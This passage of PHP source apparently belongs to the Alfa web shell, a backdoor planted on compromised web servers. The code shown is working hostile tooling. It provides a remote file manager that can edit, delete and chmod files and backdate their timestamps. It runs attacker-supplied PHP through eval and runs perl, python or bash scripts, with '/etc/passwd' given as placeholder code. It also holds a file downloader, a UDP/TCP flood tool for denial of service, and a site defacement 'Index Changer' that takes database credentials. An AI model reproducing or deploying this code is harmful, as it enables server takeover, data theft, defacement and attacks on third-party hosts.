3416$icon = $GLOBALS['DB_NAME']['show_icons']?'<img src="'.findicon($f['name'],$f['type']).'" width="30" height="30">':'';
3417$style = $GLOBALS['DB_NAME']['show_icons']?'position:relative;display:inline-block;bottom:12px;':'';
3418echo '<tr'.($l?' class=l1':'').'><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'.$raw_name.'" class="chkbx" id="'.$checkbox .'"><label for="'.$checkbox .'"></label></div></td><td>'.$icon.'<div style="'.$style.'"><a class="main_name" href=javascript:void(0) onclick="'.(($f['type']=='file')?'editor(\''.$raw_name.'\',\'auto\',\'\',\'\',\'\',\''.$f['type'].'\');">'.($GLOBALS['cwd'].$f['name']==$GLOBALS['__file_path']?"<span class='shell_name' style='font-weight:unset;'>".$f['name']."</span>":htmlspecialchars($newname)):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '><b>| ' . htmlspecialchars($f['name']) . ' |</b>').'</a></td></div><td><span style="font-weight:unset;" class="main_size">'.(($f['type']=='file')?alfaSize($f['size']):$f['type']).'</span></td><td><span style="font-weight:unset;" class="main_modify">'.$f['modify'].'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'.$f['owner'].'/'.$f['group'].'</span></td><td><a href=javascript:void(0) onclick="editor(\''.$raw_name.'\',\'chmod\',\'\',\'\',\'\',\''.$f['type'].'\')">'.
3419$f['perms'].'</td><td><a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'rename\',\'\',\'\',\'\',\''.$f['type'].'\')">R</a> <a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'touch\',\'\',\'\',\'\',\''.$f['type'].'\')">T</a>'.(($f['type']=='file')?' <a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'edit\',\'\',\'\',\'\',\''.$f['type'].'\')">E</a> <a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$raw_name.'\', \'download\')">D</a>':'').'<a class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '.addslashes(rawurldecode($f['name'])).' # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \''.$raw_name.'\') : \'\';"> X </a></td></tr>';
3420$l = $l?0:1;
3421$cc++;
3422}
3423echo "<tr><td colspan=7>
3424<input type=hidden name=a value='FilesMan'>
3425<input type=hidden name=c value='".htmlspecialchars((isset($GLOBALS['glob_chdir_false'])?$_POST['c']:$GLOBALS['cwd']))."'>
3426<input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
3427<select id='tools_selector' name='alfa1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete' selected>Delete</option><option value='zip'>Add 2 Compress (zip)</option><option value='unzip'>Add 2 Uncompress (zip)</option><option value='paste'>Paste / Zip / Unzip </option></select>
3428<input type='submit' value=' '>
3429</form></table></div></div>";
3430alfafooter();
3431}
3432function alfaFilesTools(){
3433alfahead();
3434echo '<div class="filestools">';
3435if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);
3436$alfa1_decoded = $_POST['alfa1'];
3437$chdir_fals = false;
3438if(!@chdir($_POST['c'])){
3439 $chdir_fals = true;
3440 $_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"];
3441 $alfa_canruncmd = _alfa_can_runCommand(true,true);
3442 if($alfa_canruncmd){
3443 $slashed_alfa1 = addslashes($_POST['alfa1']);
3444 $file_info = explode(":", alfaEx('stat -c "%F:%U:%G:%s:%Y:0%a:%A" "'.$slashed_alfa1.'"'));
3445 $perm_color_class = alfaEx("if [[ -w '".$slashed_alfa1."' ]]; then echo main_green_perm; elif [[ -r '".$slashed_alfa1."' ]]; then echo main_white_perm; else echo main_red_perm; fi");
3446 }
3447}
3448if($_POST['alfa2'] == 'auto'){
3449if(is_array(@getimagesize($_POST['alfa1']))){
3450$_POST['alfa2'] = 'image';
3451}else{
3452 $_POST['alfa2'] = 'view';
3453 if($chdir_fals){
3454 if($alfa_canruncmd){
3455 $mime = explode(":", alfaEx("file --mime-type '".addslashes($_POST['alfa1'])."'"));
3456 $mimetype = $mime[1];
3457 if(!empty($mimetype)){
3458 if(strstr($mimetype, "image")){
3459 $_POST['alfa2'] = 'image';
3460 }
3461 }
3462 }
3463 }
3464}
3465}
3466if($_POST['alfa2'] == "rename" && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])){$rename_cache = $_POST['alfa3'];}
3467if(@$_POST['alfa2'] == 'mkfile'){
3468$_POST['alfa1'] = trim($_POST['alfa1']);
3469if($chdir_fals&&$alfa_canruncmd){
3470 if(_alfa_is_writable($_POST["c"])){
3471 alfaEx("cd '".addslashes($_POST["c"])."';touch '".addslashes($alfa1_decoded)."'");
3472 $_POST['alfa2'] = "edit";
3473 }
3474}
3475if(!@file_exists($_POST['alfa1'])){
3476$fp = @fopen($_POST['alfa1'], 'w');
3477if($fp){
3478$_POST['alfa2'] = "edit";
3479fclose($fp);
3480}
3481}else{
3482$_POST['alfa2'] = "edit";
3483}
3484}
3485if(!_alfa_file_exists(@$_POST['alfa1'])){
3486echo __pre()."<center><p><div class=\"txtfont\"><font color='red'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory('".$_POST['alfa4']."');</script>";
3487alfaFooter();
3488return;
3489}
3490if($chdir_fals){
3491$filesize = $file_info[3];
3492$uid["name"] = $file_info[1];
3493$gid["name"] = $file_info[2];
3494$permcolor = alfaPermsColor(array("class"=>$perm_color_class,"num"=>$file_info[5],"human"=>$file_info[6]),true);
3495}else{
3496$uid = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($_POST['alfa1'])):'';
3497$gid = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($_POST['alfa1'])):'';
3498if(!$uid&&!$gid){
3499$uid['name'] = function_exists("fileowner")?@fileowner($_POST['alfa1']):'';
3500$gid['name'] = function_exists("filegroup")?@filegroup($_POST['alfa1']):'';
3501}
3502$permcolor = alfaPermsColor($_POST['alfa1']);
3503$filesize = @filesize($_POST['alfa1']);
3504if(!isset($uid['name'],$gid['name'])||empty($uid['name'])||empty($gid['name'])){
3505 if(_alfa_can_runCommand()){
3506 list($uid['name'],$gid['name']) = explode(":", alfaEx('stat -c "%U:%G" "'.addslashes($_POST["c"]."/".$_POST["alfa1"]).'"'));
3507 }
3508}
3509}
3510echo '<span class="editor_file_info_vars">Name:</span> '.htmlspecialchars($alfa1_decoded).' <span class="editor_file_info_vars">Size:</span> '.alfaSize($filesize).' <span class="editor_file_info_vars">Permission:</span> '.$permcolor.' <span class="editor_file_info_vars">Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].' <span class="editor_file_info_vars">Directory:</span> '.str_replace("//", "/",($chdir_fals?"":$_POST['c'].'/').$_POST['alfa1']).'<br><br>';
3511if(empty($_POST['alfa2']))$_POST['alfa2'] = 'view';
3512if(!_alfa_is_dir($_POST['alfa1'])){
3513$m = array('View', 'Edit', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump');
3514$ftype = "file";
3515}else{
3516$m = array('Chmod', 'Rename', 'Touch');
3517$ftype = "dir";
3518}
3519foreach($m as $v)
3520echo $v == 'Delete' ? '<a href="javascript:void(0);" onclick="var chk=confirm(\'Are You Sure For Delete This File ?\');chk?editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\'):\'\';"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a> ' : '<a href="javascript:void(0);" onclick="editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\')"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a>';
3521echo '<br><br>';
3522switch($_POST['alfa2']){
3523case 'view':
3524@chdir($_POST['c']);
3525echo '<div class="editor-view"><div class="view-content"><p><button style="border-radius:10px;" class="button" onClick="copyToClipboard(\'view_ml_content\');">copy to clipboard</button></p><pre class="ml1" id="view_ml_content">';
3526echo htmlspecialchars(__read_file($_POST['alfa1']));
3527echo '</pre></div></div>';
3528break;
3529case 'highlight':
3530@chdir($_POST['c']);
3531if(@is_readable($_POST['alfa1'])){
3532echo '<div class="editor-view"><div class="view-content"><div class="ml1" style="background-color: #e1e1e1;color:black;">';
3533$code = @highlight_file($_POST['alfa1'],true);
3534echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div></div></div>';
3535}
3536break;
3537case 'delete':
3538@chdir($_POST['c']);
3539if(@is_writable($_POST['alfa1'])||isset($GLOBALS["glob_chdir_false"])){
3540$deleted = true;
3541if(!@unlink($_POST['alfa1'])){
3542 $deleted = false;
3543 if($alfa_canruncmd){
3544 if(_alfa_is_writable($_POST['alfa1'])){
3545 alfaEx("rm -f '".addslashes($_POST['alfa1'])."'");
3546 $deleted = true;
3547 }
3548 }
3549}
3550if($deleted)echo 'File Deleted...<script>var elem = $("'.$_POST['alfa4'].'").parentNode;elem.parentNode.removeChild(elem);delete editor_files["'.$_POST['alfa4'].'"];</script>';else echo 'Error...';}
3551break;
3552case 'chmod':
3553@chdir($_POST['c']);
3554if(!empty($_POST['alfa3'])){
3555$perms = 0;
3556for($i=strlen($_POST['alfa3'])-1;$i>=0;--$i)
3557$perms += (int)$_POST['alfa3'][$i]*pow(8, (strlen($_POST['alfa3'])-$i-1));
3558if(!@chmod($_POST['alfa1'], $perms)){
3559if($chdir_fals&&$alfa_canruncmd){
3560alfaEx("cd '".addslashes($_POST["c"])."';chmod ".addslashes($_POST['alfa3'])." '".addslashes($alfa1_decoded)."'");
3561echo('Success!');
3562}else{
3563echo '<font color="#FFFFFF"><b>Can\'t set permissions!</b></font><br><script>document.mf.alfa3.value="";</script>';}
3564}else{echo('Success!');}
3565}
3566clearstatcache();
3567AlfaNum(8,9,10,7,6,5,4,2,1);
3568if($chdir_fals){
3569 $file_perm = $file_info[5];
3570}else{
3571 $file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])),-4);
3572}
3573echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.chmod.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="chmod" value="'.$file_perm.'"><input type=submit value=" "></form>';
3574break;
3575case 'edit':
3576@chdir($_POST['c']);
3577if(!@is_writable($_POST['alfa1'])&&!_alfa_is_writable($_POST['alfa1'])){
3578echo 'File isn\'t writeable';
3579break;
3580}
3581if(!empty($_POST['alfa3'])){
3582$_POST['alfa3'] = substr($_POST['alfa3'],1);
3583$time = @filemtime($_POST['alfa1']);
3584$fp = @__write_file($_POST['alfa1'],$_POST['alfa3']);
3585if($chdir_fals&&$alfa_canruncmd){
3586 $rname = $alfa1_decoded;
3587 $randname = $rname.rand(111,9999);
3588 $filepath = dirname($_SERVER["SCRIPT_FILENAME"])."/".$randname;
3589 if($fp = @__write_file($filepath ,$_POST['alfa3'])){
3590 alfaEx("mv '".addslashes($filepath)."' '".addslashes($_POST["alfa1"])."';rm -f '".addslashes($filepath)."'");
3591 }
3592}
3593if($fp){
3594echo 'Saved!<br><script>alfa3_="";</script>';
3595@touch($_POST['alfa1'],$time,$time);
3596}
3597}
3598echo '<button class="button" style="border-radius:10px;" onClick="copyToClipboard(\'edit_textarea_content\');">copy to clipboard</button><form id="editor_edit_area" onsubmit="editor(\''.addslashes($alfa1_decoded).'\',\''.$_POST['alfa2'].'\',\'1\'+this.text.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><p><input type="submit" value=" "></p><textarea name="text" id="edit_textarea_content" class="bigarea" onkeydown="saveByKey(event);">';
3599echo htmlspecialchars(__read_file($_POST['alfa1']));
3600echo '</textarea><p><input type="submit" value=" "></p></form>';
3601break;
3602case 'hexdump':
3603@chdir($_POST['c']);
3604$c = __read_file($_POST['alfa1']);
3605$n = 0;
3606$h = array('00000000<br>','','');
3607$len = strlen($c);
3608for ($i=0; $i<$len; ++$i) {
3609$h[1] .= sprintf('%02X',ord($c[$i])).' ';
3610switch ( ord($c[$i]) ) {
3611case 0: $h[2] .= ' '; break;
3612case 9: $h[2] .= ' '; break;
3613case 10: $h[2] .= ' '; break;
3614case 13: $h[2] .= ' '; break;
3615default: $h[2] .= $c[$i]; break;
3616}
3617$n++;
3618if ($n == 32) {
3619$n = 0;
3620if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
3621$h[1] .= '<br>';
3622$h[2] .= "\n";
3623}
3624}
3625echo '<div class="editor-view"><div class="view-content"><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table></div></div>';
3626break;
3627case 'rename':
3628@chdir($_POST['c']);
3629$alfa1_escape = addslashes($_POST["alfa1"]);
3630$alfa3_escape = addslashes($_POST["alfa3"]);
3631if(!empty($_POST['alfa3'])){
3632$cmd_rename = false;
3633if($chdir_fals&&$alfa_canruncmd){
3634if(_alfa_is_writable($_POST['alfa1'])){
3635$alfa1_escape = addslashes($alfa1_decoded);
3636alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa3'])."'");
3637}else{
3638$cmd_rename = true;
3639}
3640}else{
3641$alfa1_escape = addslashes($_POST["alfa1"]);
3642}
3643if(!@rename($_POST['alfa1'], $_POST['alfa3'])&&$cmd_rename){
3644echo 'Can\'t rename!<br>';}else{echo('Renamed!<script>try{$("'.$_POST['alfa4'].'").innerHTML = "<div class=\'editor-icon\'>"+loadType(\''.$alfa3_escape.'\',\''.$ftype.'\',\''.$_POST['alfa4'].'\')+"</div><div class=\'editor-file-name\'>'.$alfa3_escape.'</div>";editor_files["'.$_POST['alfa4'].'"].file = "'.$alfa3_escape.'";d.files.innerHTML = d.files.innerHTML.replace(/\\\''.$alfa1_escape.'\\\'/g, "\''.$alfa3_escape.'\'");d.files.innerHTML = d.files.innerHTML.replace(/value\=\"'.$alfa1_escape.'\"/, \'value\=\"'.$alfa3_escape.'\"\');d.files.innerHTML = d.files.innerHTML.replace(/'.$alfa1_escape.'\<\/a\>/g, "'.$alfa3_escape.'</a>");d.files.innerHTML = d.files.innerHTML.replace(/Are You Sure For Delete # '.$alfa1_escape.' # \?/, "Are You Sure For Delete # '.$alfa3_escape.' # ?");'.($ftype == "dir"?"updateDirsEditor('".$_POST['alfa4']."','".$alfa1_escape."');":"").'}catch(e){console.log(e)}</script>');$alfa1_escape = $alfa3_escape;}
3645}
3646echo '<form onsubmit="editor(\''.$alfa1_escape.'\',\''.$_POST['alfa2'].'\',this.name.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="name" value="'.addslashes(htmlspecialchars(isset($_POST['alfa3'])&&$_POST['alfa3']!=''?$_POST['alfa3']:$alfa1_decoded)).'"><input type=submit value=" "></form>';
3647break;
3648case 'touch':
3649@chdir($_POST['c']);
3650if( !empty($_POST['alfa3']) ) {
3651$time = strtotime($_POST['alfa3']);
3652if($time){
3653$touched = false;
3654if($chdir_fals&&$alfa_canruncmd){
3655 alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa3']))."' '".addslashes($alfa1_decoded)."'");
3656 $touched = true;
3657}
3658if(!@touch($_POST['alfa1'],$time,$time)&&!$touched)
3659echo 'Fail!';
3660else
3661echo 'Touched!';
3662} else echo 'Bad time format!';
3663}
3664clearstatcache();
3665echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.touch.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", ($chdir_fals?$file_info[4]:@filemtime($_POST['alfa1']))).'"><input type=submit value=" "></form>';
3666break;
3667case 'image':
3668@chdir($_POST['c']);
3669echo('<hr>');
3670$file = $_POST['alfa1'];
3671$image_info = @getimagesize($file);
3672if(is_array($image_info)||$chdir_fals){
3673$width = (int)$image_info[0];
3674$height = (int)$image_info[1];
3675if($chdir_fals&&$alfa_canruncmd){
3676 $source = alfaEx("cat '".addslashes($file)."' | base64");
3677 list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '".addslashes($file)."'"));
3678 $mime = explode(":", alfaEx("file --mime-type '".addslashes($file)."'"));
3679 $image_info['mime'] = $mime[1];
3680}else{
3681 $source = __ZW5jb2Rlcg(__read_file($file, false));
3682}
3683$image_info_h = "Image type = <span>[</span> ".$image_info['mime']." <span>]</span><br>Image Size = <span>[ </span>".$width." x ".$height."<span> ]</span><br>";
3684if($width > 800){$width = 800;}
3685echo $content = "<div class='editor-view'><div class='view-content'><center>".$image_info_h."<br><img id='viewImage' style='max-width:100%;border:1px solid green;' src='data:".$image_info['mime'].";base64,".$source."' alt='".$file."'></center></div></div><br>";
3686}
3687break;
3688}
3689echo '</div>';
3690alfaFooter();
3691}
3692function findicon($file,$type){
3693$s = 'http://solevisible.com/icons/';
3694$types = array('json','ppt','pptx','xls','xlsx','msi','config','cgi','pm','c','cpp','cs','java','aspx','asp','db','ttf','eot','woff','woff2','woff','conf','log','apk','cab','bz2','tgz','dmg','izo','jar','7z','iso','rar','bat','sh','alfa','gz','tar','php','php4','php5','phtml','html','xhtml','shtml','htm','zip','png','jpg','jpeg','gif','bmp','ico','txt','js','rb','py','xml','css','sql','htaccess','pl','ini','dll','exe','mp3','mp4','m4a','mov','flv','swf','mkv','avi','wmv','mpg','mpeg','dat','pdf','3gp','doc','docx','docm');
3695if($type!='file'){
3696return ($file=='..'?$s.'back.png':$s.'folder.png');
3697}else{
3698$ext = explode('.',$file);
3699$ext = end($ext);
3700$ext = strtolower($ext);
3701return (in_array($ext,$types)?$s.$ext.'.png':$s.'notfound.png');
3702}
3703}
3704function alfadlfile(){
3705if(isset($_POST['c'],$_POST['file'])){
3706$basename = rawurldecode(basename($_POST['file']));
3707$_POST['file'] = str_replace("//", "/", $_POST['c'].'/'.$basename);
3708$alfa_canruncmd = _alfa_can_runCommand(true,true);
3709if(@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd){
3710ob_start("ob_gzhandler", 4096);
3711header("Content-Disposition: attachment; filename=\"".addslashes($basename)."\"");
3712header("Content-Type: application/octet-stream");
3713if(isset($GLOBALS["glob_chdir_false"])){
3714 $randname = $basename.rand(111,9999);
3715 $scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);
3716 $filepath = $scriptpath."/".$randname;
3717 if(_alfa_is_writable($scriptpath)){
3718 alfaEx("cp '".addslashes($_POST["file"])."' '".addslashes($filepath)."'");
3719 readfile($filepath);
3720 @unlink($filepath);
3721 }else{
3722 alfaEx("cat '".addslashes($_POST["file"])."'");
3723 }
3724}else{
3725 readfile($_POST['file']);
3726}
3727}else echo('Error...!');}}
3728function alfaphpeval(){
3729alfahead();
3730if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini')){
3731echo '<div class=header>';
3732ob_start();
3733$INI=ini_get_all();
3734print '<table border=0><tr>'
3735.'<td class="listing"><font class="highlight_txt">Param</td>'
3736.'<td class="listing"><font class="highlight_txt">Global value</td>'
3737.'<td class="listing"><font class="highlight_txt">Local Value</td>'
3738.'<td class="listing"><font class="highlight_txt">Access</td></tr>';
3739foreach ($INI as $param => $values)
3740print "\n".'<tr>'
3741.'<td class="listing"><b>'.$param.'</td>'
3742.'<td class="listing">'.$values['global_value'].' </td>'
3743.'<td class="listing">'.$values['local_value'].' </td>'
3744.'<td class="listing">'.$values['access'].' </td></tr>';
3745$tmp = ob_get_clean();
3746$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
3747$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
3748echo str_replace('<h1','<h2', $tmp) .'</div><br>';
3749}
3750if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info')) {
3751echo '<div class=header><style>.p {color:#000;}</style>';
3752ob_start();
3753phpinfo();
3754$tmp = ob_get_clean();
3755$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
3756$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
3757echo str_replace('<h1','<h2', $tmp) .'</div><br>';
3758}
3759if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten')) {
3760echo '<div class=header>';
3761ob_start();
3762$EXT=get_loaded_extensions();
3763echo '<table border=0><tr><td class="listing">'.implode('</td></tr>'."\n".'<tr><td class="listing">', $EXT).'</td></tr></table>'.count($EXT).' extensions loaded';
3764echo '</div><br>';
3765}
3766$lang_html = "";
3767foreach(array("php"=>"php ~> [ Windows / Linux ]","perl"=>"perl ~> [ Linux ]","python"=>"python ~> [ Linux ]","bash"=>"bash ~> [ Linux ]") as $key=>$val){$lang_html .= '<option value="'.$key.'" '.($_POST["alfa3"]==$key?"selected":"").'>'.$val.'</option>';}
3768echo '<div class=header><Center><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'info\')"> | phpinfo |</a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'exten\')"> | extensions |</a></center><br><form name=pf method=post onsubmit="g(\'phpeval\',null,this.code.value,null,this.language.value); return false;"><div class="txtfont">Select Language: </div> <select name="language" style="width:300px;">'.$lang_html.'</select><br><br><textarea placeholder="file_get_contents(\'/etc/passwd\');" name=code class=bigarea id=PhpCode>'.(!empty($_POST['alfa1'])?htmlspecialchars($_POST['alfa1']):'').'</textarea><center><input type="submit" value="" style="margin-top:5px"></center>';
3769echo '</form><pre id=PhpOutput style="'.(empty($_POST['alfa1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
3770if(!empty($_POST['alfa1'])){
3771if($_POST['alfa3']=="php"){
3772ob_start();
3773eval($_POST['alfa1']);
3774$result = htmlspecialchars(ob_get_clean());
3775}elseif(_alfa_can_runCommand()&&$GLOBALS["sys"]=="unix"){
3776 if(isset($_SESSION["eval_tmpdir"])){
3777 $tempdir = $_SESSION["eval_tmpdir"];
3778 }else{
3779 $tempdir = dirname(alfaEx("mktemp"));
3780 $_SESSION["eval_tmpdir"] = $tempdir;
3781 }
3782 $lang = $_POST['alfa3'];
3783 $filename = "temp".rand(11111,99999);
3784 $temp = $tempdir."/".$filename ;
3785 __write_file($filename, $_POST['alfa1']);
3786 $result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");
3787 @unlink($filename);
3788 @unlink($temp);
3789}
3790echo '<textarea class=bigarea id="PhpCode">'.$result.'</textarea>';
3791}
3792echo '</pre></div>';
3793alfafooter();
3794}
3795function alfahash(){
3796if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
3797if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
3798$stringTools = array(
3799'Base64_encode ( $string )' => '__ZW5jb2Rlcg($s)',
3800'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)',
3801'strrev ( $string )' => 'strrev($s)',
3802'bin2hex ( $string )' => 'bin2hex($s)',
3803'hex2bin ( $string )' => 'hex2bin($s)',
3804'md5 ( $string )' => 'md5($s)',
3805'sha1 ( $string )' => 'sha1($s)',
3806'hash ( "sha251", $string ) --> sha251' => 'hash("sha256",$s)',
3807'hash ( "sha384", $string ) --> sha384' => 'hash("sha384",$s)',
3808'hash ( "sha512", $string ) --> sha512' => 'hash("sha512",$s)',
3809'crypt ( $string )' => 'crypt($s)',
3810'crc32 ( $string )' => 'crc32($s)',
3811'str_rot13 ( $string )' => 'str_rot13($s)',
3812'urlencode ( $string )' => 'urlencode($s)',
3813'urldecode ( $string )' => 'urldecode($s)',
3814'full_urlencode ( $string )' => 'full_urlencode($s)',
3815'htmlspecialchars ( $string )' => 'htmlspecialchars($s)',
3816'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))',
3817'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))',
3818'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))',
3819'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))',
3820'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))',
3821'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))',
3822);
3823alfahead();
3824echo '<div class=header>';
3825echo "<form onSubmit='g(\"hash\",null,this.selectTool.value,this.input.value);return false;'><div class='txtfont'>Method:</div> <select name='selectTool' style='width:400px;'>";
3826foreach($stringTools as $k => $v)
3827echo "<option value='".htmlspecialchars($v)."' ".($_POST['alfa1']==$v?'selected':'').">".$k."</option>";
3828echo "</select> <input type='submit' value=' '/><br><textarea name='input' style='margin-top:5px' class='bigarea'>".(empty($_POST['alfa1'])?'':htmlspecialchars(@$_POST['alfa2']))."</textarea></form>";
3829if(!empty($_POST['alfa1'])){
3830$string = addslashes($_POST['alfa2']);
3831$string = str_replace('\"','"',$string);
3832$alg = $_POST['alfa1'];
3833$code = str_replace('$s',"'".$string."'",$alg);
3834ob_start();
3835eval('echo '.$code.';');
3836$res = ob_get_contents();
3837ob_end_clean();
3838if(in_array($alg, $stringTools))echo '<textarea class="bigarea" id="PhpCode">'.htmlspecialchars($res).'</textarea>';
3839}
3840echo "</div>";
3841alfaFooter();
3842}
3843function alfados(){
3844alfahead();
3845echo '<div class=header>';
3846echo '<center><p><div class="txtfont_header">| DOS |</div></p><form onSubmit="g(\'dos\',null,this.host.value,this.time.value,this.port.value,this.m.value); return false;"><div class="txtfont">Method : <select name="m" style="width:80px;"><option value="udp">UDP</option><option value="tcp">TCP</option></select> Host : <input name="host" type="text" value="localhost" size="25" /> Time : <input name="time" type="text" size="15" /> Port : <input name="port" type="text" size="10" /> <input type="submit" value=" " /></div></form></center><br>';
3847if(!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])){
3848echo __pre();
3849$packets=0;
3850ignore_user_abort(true);
3851$exec_time=(int)$_POST['alfa2'];
3852$time=time();
3853$max_time=$exec_time+$time;
3854$host=$_POST['alfa1'];
3855$port=(int)$_POST['alfa3'];
3856$method=$_POST['alfa4'];
3857$out = str_repeat('X',65000);
3858while(1){
3859$packets++;
3860if(time() > $max_time){
3861break;
3862}
3863$fp = @fsockopen($method.'://'.$host, $port, $errno, $errstr, 5);
3864if($fp){
3865fwrite($fp, $out);
3866fclose($fp);
3867}
3868}
3869echo "<center>$packets (" . @round(($packets*65)/1024, 2) . " MB) packets averaging ". @round($packets/$exec_time, 2) . " packets per second</center>";
3870echo "</pre>";
3871}
3872echo '</div>';
3873alfafooter();
3874}
3875function __pre(){return('<pre id="strOutput" style="margin-top:5px" class="ml1">');}
3876function alfaIndexChanger(){
3877alfahead();
3878
3879echo '<div class=header><center><p><div class="txtfont_header">| Index Changer |</div></p><h3><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,null,\'whmcs\')">| Whmcs | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,\'vb\',null)">| vBulletin | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,\'mybb\')">| MyBB | </a></h3></center>';
3880if(isset($_POST['alfa3'])&&($_POST['alfa3'] == 'whmcs')){
3881echo __pre();
3882
3883echo "<center><center><div class='txtfont_header'>| Whmcs |</div>
3884<p><center>".getConfigHtml('whmcs')."<form onSubmit=\"g('IndexChanger',null,null,null,'whmcs',this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value); return false;\">
3885";
3886$table = array('td1' =>
3887 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
3888 'td2' =>
3889 array('color' => 'FFFFFF', 'tdName' => 'URL', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
3890 'td3' =>
3891 array('color' => 'FFFFFF', 'tdName' => 'File Name', 'inputName' => 'fname', 'inputValue' => '', 'inputSize' => '50'),
3892 'td4' =>
3893 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
3894 'td5' =>
3895 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
3896 'td6' =>
3897 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
